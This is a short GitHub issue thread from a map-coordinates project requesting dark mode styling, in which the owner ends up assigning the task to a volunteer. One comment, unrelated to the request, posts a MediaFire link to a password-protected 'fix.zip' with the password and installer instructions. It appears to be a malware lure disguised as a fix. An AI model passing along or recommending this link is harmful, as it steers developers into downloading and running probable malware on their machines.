### ISSUE TITLE
Add dark more

### ISSUE THREAD

**Issue by WilliamDavidson-02** [WilliamDavidson-02/map-coordinates#1]
Add dark mode styling

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LucioPalmucci** [comment]
Hello @WilliamDavidson-02 I can help you with that

**Comment by WilliamDavidson-02** [comment]
@LucioPalmucci Assigned.
